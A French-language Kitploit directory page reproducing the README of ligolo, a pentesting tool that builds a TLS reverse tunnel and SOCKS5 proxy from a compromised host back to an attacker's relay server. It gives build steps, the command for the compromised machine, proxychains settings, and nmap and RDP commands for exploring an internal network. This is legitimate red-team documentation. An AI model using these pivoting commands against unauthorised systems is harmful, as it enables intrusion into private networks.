Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
ligolo — Tunnel inversé simplifié pour les pentesters, par les pentesters https://sysdream.com/ | Kitploit
Outils/GitHubGitHub/sysdream/ligolo
Mouvement LatéralTests d'IntrusionRed Teaming
GitHubsysdream/ligolo

ligolo

Tunnel inversé simplifié pour les pentesters, par les pentesters https://sysdream.com/

Voir le dépôt
1.8k22710il y a 6 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Ligolo : Le tunnellisation inversée simplifiée pour les pentesteurs, par des pentesteurs

forthebadge forthebadge

Ligolo

Table des matières

  • Introduction
  • Cas d'utilisation
  • Démo rapide
  • Performance
  • Utilisation
    • Installation / Compilation
    • Comment utiliser ?
    • TL;DR
    • Options
  • Fonctionnalités
  • À faire
  • Licence
  • Crédits

Introduction

est un outil et pour établir des tunnels ou depuis une connexion inversée en toute sécurité (certificat TLS à courbe elliptique).

Ligolo
simple
léger
SOCKS5
TCP

Il est comparable à Meterpreter avec Autoroute + Socks4a, mais plus stable et plus rapide.

Cas d'utilisation

Vous avez compromis un serveur Windows / Linux / Mac lors de votre audit externe. Ce serveur se trouve à l'intérieur d'un réseau local et vous souhaitez établir des connexions vers d'autres machines sur ce réseau.

Ligolo peut configurer un tunnel pour accéder aux ressources du serveur interne.

Démo rapide

Relais d'une connexion RDP via Proxychains (WAN).

RDP

Performance

Voici une capture d'écran d'un test de vitesse entre deux hôtes 100 mb/s (ligolo / localrelay). Les performances peuvent varier selon la configuration système et réseau.

Speedtest

Utilisation

Installation / Compilation

Assurez-vous que Go est installé et fonctionne.

  1. Obtenez Ligolo et les dépendances
root@kitploit:~
cd `go env GOPATH`/src
git clone https://github.com/sysdream/ligolo
cd ligolo
make dep
  1. Générez des certificats TLS auto-signés (seront placés dans le dossier certs)
root@kitploit:~
make certs TLS_HOST=example.com

NOTE : Vous pouvez également utiliser vos propres certificats en utilisant l'option TLS_CERT de make lors de l'appel de build. Exemple : make build-all TLS_CERT=certs/mycert.pem.

  1. Compilation
  • 3.1. Pour toutes les architectures
root@kitploit:~
make build-all
  • 3.2. (ou) Pour l'architecture actuelle
root@kitploit:~
make build

Comment utiliser ?

Ligolo se compose de deux modules :

  • localrelay
  • ligolo

Localrelay est destiné à être lancé sur le serveur de contrôle (le serveur de l'attaquant).

Ligolo est le programme à exécuter sur la machine cible.

Pour localrelay, vous pouvez laisser les options par défaut. Il écoute sur toutes les interfaces sur le port 5555 et attend les connexions de ligolo (paramètre -relayserver).

Pour ligolo, vous devez spécifier l'adresse IP du serveur relais (ou de votre serveur d'attaque) à l'aide du paramètre -relayserver ip:port.

Vous pouvez utiliser l'option -h pour obtenir de l'aide.

Une fois la connexion établie entre Ligolo et LocalRelay, un proxy SOCKS5 sera mis en place sur le port TCP 1080 sur le serveur relais (vous pouvez changer l'adresse/port TCP à l'aide de l'option -localserver).

Ensuite, il vous suffit d'utiliser votre outil préféré (Proxychains par exemple) et d'explorer le réseau local du client.

TL;DR

Sur votre serveur d'attaque.

root@kitploit:~
./bin/localrelay_linux_amd64

Sur l'hôte compromis.

root@kitploit:~
> ligolo_windows_amd64.exe -relayserver LOCALRELAYSERVER:5555

Une fois la connexion établie, définissez les paramètres suivants dans le fichier de configuration de ProxyChains (sur le serveur d'attaque) :

root@kitploit:~
[ProxyList]
# ajouter un proxy ici ...
# en attendant
# les valeurs par défaut sont réglées sur "tor"
socks5     127.0.0.1 1080

Profitez.

root@kitploit:~
$ proxychains nmap -sT 10.0.0.0/24 -p 80 -Pn -A
$ proxychains rdesktop 10.0.0.123

Options

Options de Localrelay :

root@kitploit:~
Usage of localrelay:
  -certfile string
    	Le certificat serveur TLS (par défaut "certs/server.crt")
  -keyfile string
    	La clé serveur TLS (par défaut "certs/server.key")
  -localserver string
    	L'adresse du serveur local (votre paramètre proxychains) (par défaut "127.0.0.1:1080")
  -relayserver string
    	L'adresse d'écoute du serveur relais (l'adresse de connexion retour) (par défaut "0.0.0.0:5555")

Options de Ligolo :

root@kitploit:~
Usage of ligolo:
  -autorestart
    	Tenter de se reconnecter en cas d'exception
  -relayserver string
    	Le serveur relais (l'adresse de connexion retour) (par défaut "127.0.0.1:5555")
  -skipverify
    	Ignorer la vérification de l'épinglage du certificat TLS
  -targetserver string
    	Le serveur de destination (un client RDP, serveur SSH, etc.) - lorsqu'il n'est pas spécifié, Ligolo démarre un serveur proxy socks5

Fonctionnalités

  • Tunnel TLS 1.3 avec épinglage TLS
  • Multiplateformes (Windows / Linux / Mac / ...)
  • Multiplexage (1 connexion TCP pour tous les flux)
  • Proxy SOCKS5 ou relais simple

À faire

  • Meilleure gestion des timeouts
  • Support UDP SOCKS5
  • Implémenter mTLS

Licence

GNU General Public License v3.0 (Voir LICENSING).

Crédits

  • Nicolas Chatelain <n.chatelain -at- sysdream.com>

Sysdream

Télécharger l’outil